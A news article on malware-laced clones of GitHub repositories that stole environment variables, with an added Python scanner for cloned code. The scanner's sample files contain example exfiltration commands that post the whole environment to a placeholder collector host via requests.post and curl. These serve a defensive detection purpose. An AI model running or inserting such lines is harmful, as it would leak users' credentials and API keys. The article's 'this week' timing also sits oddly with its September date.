September 24, 2022

Developer platform GitHub has been inundated with malware that has infiltrated tens of thousands of repositories.

Up to 35,000 GitHub repositories have been cloned with malware, according to a security researcher.

The widespread malware attack did not specifically target crypto repositories (repos), but they were among those affected.

Software engineer Stephen Lacy notified the crypto community of the hack on August 3.

Cloned GitHub repositories

Tech portal Bleeping Computer reported that the repos were not hacked but copied, with the clones altered to include the malware. Cloning open-source code is a common practice among developers; in this case, however, attackers inserted malicious code and links into copies of legitimate projects to target unsuspecting developers.

Projects related to crypto, Golang, Python, JavaScript, Bash, Docker and Kubernetes have been affected by the attack, the researcher noted.

While reviewing a project he had found through a Google search, the engineer noticed a malicious URL in the code. A search of GitHub repositories for this URL returned more than 35,000 results.

Bleeping Computer said more than 13,000 search results came from a single repository called “redhat-operator-ecosystem.” The malicious URL “infiltrated a user’s environment variables, but additionally contained a one-line backdoor,” the report added.

These environment variables can contain sensitive data such as API keys, tokens, Amazon AWS credentials, and encryption keys. The malware also allows remote attackers to execute arbitrary code on the systems of anyone who installs and runs the clones.
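A pre-run check for a freshly cloned repository, as an added example that is not taken from the report or from GitHub: it flags lines that read the whole environment and also reach a network sink, the pattern described above. The regexes, file names and `example.invalid` hosts are assumptions made for illustration, and a same-line heuristic misses code that is split across lines or obfuscated.

```python
import re
from pathlib import Path

# Heuristic patterns chosen for this example (assumptions, not indicators from the report).
# ENV_DUMP: code that reads the *entire* environment rather than one named variable.
ENV_DUMP = re.compile(
    r"os\.environ\b(?!\s*(?:\[|\.get\b))"   # Python: os.environ, not os.environ["X"] / .get("X")
    r"|process\.env\b(?!\s*[.\[])"          # Node.js: process.env, not process.env.X
    r"|os\.Environ\(\)"                     # Go
    r"|\$\(\s*(?:env|printenv)\s*\)"        # shell: $(env), $(printenv)
)
# NET_SINK: something on the same line that can send data to a remote host.
NET_SINK = re.compile(r"https?://|\bcurl\b|\bwget\b|requests\.post|urlopen|http\.Post|\bfetch\(")

def scan_text(path, text):
    """Return (path, line number, line) for lines pairing an env dump with a network sink."""
    return [
        (path, n, line.strip())
        for n, line in enumerate(text.splitlines(), 1)
        if ENV_DUMP.search(line) and NET_SINK.search(line)
    ]

def scan_tree(root):
    """Scan every readable file under a cloned repository before installing or running it."""
    findings = []
    for p in Path(root).rglob("*"):
        if p.is_file() and ".git" not in p.parts:
            findings += scan_text(str(p), p.read_text(errors="ignore"))
    return findings

# Constructed sample files; example.invalid is a reserved, non-resolving domain.
SAMPLES = {
    "setup.py": 'import os, requests\n'
                'token = os.environ["API_TOKEN"]\n'
                'requests.post("http://collector.example.invalid/", data=dict(os.environ))\n',
    "install.sh": '#!/bin/sh\n'
                  'curl -s https://example.invalid/pkg.tgz -o pkg.tgz\n'
                  'curl -s -d "$(env)" http://collector.example.invalid/\n',
    "app.js": 'const port = process.env.PORT;\n'
              'fetch("https://api.example.invalid/" + process.env.REGION);\n',
}

def scan_samples():
    return [f for path, text in SAMPLES.items() for f in scan_text(path, text)]

if __name__ == "__main__":
    for path, n, line in scan_samples():
        print(f"{path}:{n}: {line}")
```

Reading a single named variable, as the second line of `setup.py` and both lines of `app.js` do, is not flagged; only the two whole-environment uploads are.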

The majority of the cloned repos had surfaced last month, the report said.

GitHub confirmed that the original repositories had not been compromised and that it had cleaned or quarantined the clones.

Last month, BeInCrypto reported that a new strain of malware written in Rust was making the rounds. Luca Stealer targets Windows operating systems and steals sensitive information such as crypto wallet information. The malware was also distributed on GitHub.

Bad week in crypto

DeFi researcher Miles Deutscher pointed out that it hasn’t been a great week in crypto. Earlier this week, the Nomad bridge was hacked for $190 million and a few hours after that, around 8,000 Solana wallets were hacked resulting in the theft of around $8 million.

Markets appear to remain unaffected as total market capitalization has gained 1.7% on the day to reach $1.12 trillion at the time of writing.
